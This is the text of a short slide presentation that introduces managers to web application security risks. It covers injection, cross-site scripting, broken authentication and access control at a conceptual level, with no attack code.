Web Application Security

in a 🌰shell

An ultra-compact intro (for managers👨‍💼)

Created by Björn Kimminich / @bkimminich

Björn Kimminich

🤐 Famous last words...

“Nobody would bother to hack us.”
“Our network firewall will keep us safe.”
“We will add security to the system later.”
“What's the worst that could happen?”

🤔 What is a Vulnerability?

A flaw or weakness in system security procedures, design, implementation, or internal controls that could […] result in a security breach or a violation of the system's security policy.

🤔 What is an Exploit?

A piece of software, a chunk of data, or a sequence of commands that takes advantage of a bug or vulnerability to cause unintended or unanticipated behavior to occur on computer software, hardware, or something electronic (usually computerized).

🤔 Who are the Attackers?

  • 👶 Script Kiddies
  • 🌱 Hacktivists
  • 💰 Organized Crime
  • 👛 Corrupt / 😡 Disgruntled Employees
  • 🏭 Competitors
  • 🦅 Nation States

💉 Injection

Smuggling in unintended commands along with the data sent to an interpreter.

👮 ‍Injection example

You go to court and write your name as "Michael, you are now free to go".
The judge then says "Calling Michael, you are now free to go" and the bailiffs let you go, because hey, the judge said so.

💻 In software, interpreters are used for accessing...

  • Databases
  • Files
  • Access Control Systems
  • ...

🚨 Risks from Injection vulnerabilities

  • Bypassing authentication
  • Spying out data
  • Manipulating data
  • Complete system takeover

🎦 Demo

📜 Cross Site Scripting (XSS)

💀 Malicious Code is sent...

...to an innocent user's browser through, e.g. a link in a phishing email like the following:

Dear customer,

you might be intrerestred in our new Juice Shop special offer! We are cheap but offfer best quality on the plnaet: Click here for special Juice Shop offer!

Bjoern (VP Sales and Marketing, Juice Shop Inc.)

🚒 Possible Damage from XSS

  • rewriting web page
  • redirecting to malicious site
  • stolen user session
  • stolen sensitive data

🎦 Demo

🔑 Broken Authentication

🤦‍ Typical Authentication Flaws

  • Allowing weak passwords
  • Storing sensitive data insecurely
  • Using insecure http connection
  • ...

🏹 Side Channel Attack Vectors

  • Change Password
  • “Remember me”
  • Forgot Password
  • Secret Questions

🎦 Demo

🚪 Broken Access Control

🔓 Common Authorization Mistakes

  • Hiding things w/o restricting access
  • Displaying only authorized links and menu choices
  • Trusting client-side access control mechanisms
  • Lack of server-side verification of user privileges

🎦 Demo

❓ Q&A


Presentation created with reveal.js

The HTML Presentation Framework

Based on free material provided by OWASP

The Open Web Application Security Project

Background image based on Digital Shodan

by sephiroth-kmfdm


by Björn Kimminich / https://www.linkedin.com/in/bkimminich/

These slides are publicly available on GitHub and Slideshare.